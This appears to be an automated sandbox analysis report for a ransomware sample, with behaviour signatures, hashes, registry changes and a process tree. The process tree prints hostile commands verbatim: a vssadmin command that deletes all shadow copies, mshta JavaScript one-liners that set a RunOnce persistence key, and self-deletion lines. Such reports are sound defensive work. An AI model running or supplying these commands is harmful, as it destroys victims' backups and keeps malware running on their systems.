028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560

Analysis

max time kernel
241s
max time network
273s
platform
windows7_x64
resource
win7v20210408
submitted
14/08/2021, 02:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
Size

256KB
MD5

156ed66fb7257ef1bdd6385c71e5aa83
SHA1

2d302323eab61e5791ab5ce2c6728e6708743bed
SHA256

028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560
SHA512

c63a679abf8eb64ba4a722df4638249499d8ab9e6a94db5e3d39ab136afbe4cec563ff9698814170b12e55d5616865776273303e99a5b7e8742bc870ae5ebdb4

Score

9^/10

persistence ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Blocklisted process makes network request 9 IoCs

flow	pid	Process
7	1504	mshta.exe
8	1504	mshta.exe
10	1504	mshta.exe
11	1504	mshta.exe
14	1504	mshta.exe
15	1504	mshta.exe
17	1504	mshta.exe
18	1504	mshta.exe
20	1504	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
1528	trust.exe

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\ApproveExport.tiff	trust.exe
File opened for modification	C:\Users\Admin\Pictures\WatchConvert.tiff	trust.exe

Deletes itself 1 IoCs

pid	Process
1420	mshta.exe

Loads dropped DLL 2 IoCs

pid	Process
1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\{EE750B8B-8F1F-4FEB-B415-B9B0FDBD4893} = "C:\\Users\\Admin\\AppData\\Local\\trust.exe"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run	trust.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\How to restore files = "mshta.exe \"C:\\Users\\Admin\\How to restore files.hta\""	trust.exe

Drops desktop.ini file(s) 27 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Links\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	trust.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-2455352368-1077083310-2879168483-1000\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	trust.exe

Maps connected drives based on registry 3 TTPs 4 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	trust.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	trust.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1632	vssadmin.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
888	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	mshta.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
1528	trust.exe
1528	trust.exe
1528	trust.exe
1528	trust.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeBackupPrivilege	568	vssvc.exe
Token: SeRestorePrivilege	568	vssvc.exe
Token: SeAuditPrivilege	568	vssvc.exe
Token: SeDebugPrivilege	888	taskkill.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 1976 wrote to memory of 1528	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	29
PID 1976 wrote to memory of 1528	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	29
PID 1976 wrote to memory of 1528	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	29
PID 1976 wrote to memory of 1528	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	29
PID 1976 wrote to memory of 1420	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	30
PID 1976 wrote to memory of 1420	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	30
PID 1976 wrote to memory of 1420	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	30
PID 1976 wrote to memory of 1420	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	30
PID 1528 wrote to memory of 1520	1528	trust.exe	31
PID 1528 wrote to memory of 1520	1528	trust.exe	31
PID 1528 wrote to memory of 1520	1528	trust.exe	31
PID 1528 wrote to memory of 1520	1528	trust.exe	31
PID 1528 wrote to memory of 1632	1528	trust.exe	32
PID 1528 wrote to memory of 1632	1528	trust.exe	32
PID 1528 wrote to memory of 1632	1528	trust.exe	32
PID 1528 wrote to memory of 1632	1528	trust.exe	32
PID 1528 wrote to memory of 1504	1528	trust.exe	37
PID 1528 wrote to memory of 1504	1528	trust.exe	37
PID 1528 wrote to memory of 1504	1528	trust.exe	37
PID 1528 wrote to memory of 1504	1528	trust.exe	37
PID 1528 wrote to memory of 1648	1528	trust.exe	38
PID 1528 wrote to memory of 1648	1528	trust.exe	38
PID 1528 wrote to memory of 1648	1528	trust.exe	38
PID 1528 wrote to memory of 1648	1528	trust.exe	38
PID 1648 wrote to memory of 888	1648	cmd.exe	40
PID 1648 wrote to memory of 888	1648	cmd.exe	40
PID 1648 wrote to memory of 888	1648	cmd.exe	40
PID 1648 wrote to memory of 888	1648	cmd.exe	40
PID 1528 wrote to memory of 1392	1528	trust.exe	42
PID 1528 wrote to memory of 1392	1528	trust.exe	42
PID 1528 wrote to memory of 1392	1528	trust.exe	42
PID 1528 wrote to memory of 1392	1528	trust.exe	42

C:\Users\Admin\AppData\Local\Temp\028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
"C:\Users\Admin\AppData\Local\Temp\028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe"
1⤵
- Loads dropped DLL
- Maps connected drives based on registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Users\Admin\AppData\Local\trust.exe
  "C:\Users\Admin\AppData\Local\trust.exe" runas
  2⤵
  - Executes dropped EXE
  - Modifies extensions of user files
  - Adds Run key to start application
  - Drops desktop.ini file(s)
  - Maps connected drives based on registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1528
- - C:\Windows\SysWOW64\mshta.exe
    mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');setInterval(function(){try{o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{EE750B8B-8F1F-4FEB-B415-B9B0FDBD4893}','C:\\Users\\Admin\\AppData\\Local\\trust.exe');}catch(e){}},10);"
    3⤵
    - Adds Run key to start application
    - Modifies Internet Explorer settings
    PID:1520
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1632
- - C:\Windows\SysWOW64\mshta.exe
    mshta.exe "C:\Users\Admin\How to restore files.hta"
    3⤵
    - Blocklisted process makes network request
    - Modifies Internet Explorer settings
    - Modifies system certificate store
    PID:1504
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C taskkill /PID 1520 /F
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1648
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /PID 1520 /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:888
- - C:\Windows\SysWOW64\mshta.exe
    mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('C:\\Users\\Admin\\AppData\\Local\\trust.exe');close()}catch(e){}},10);"
    3⤵
    - Modifies Internet Explorer settings
    PID:1392
- C:\Windows\SysWOW64\mshta.exe
  mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('C:\\Users\\Admin\\AppData\\Local\\Temp\\028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe');close()}catch(e){}},10);"
  2⤵
  - Deletes itself
  - Modifies Internet Explorer settings
  PID:1420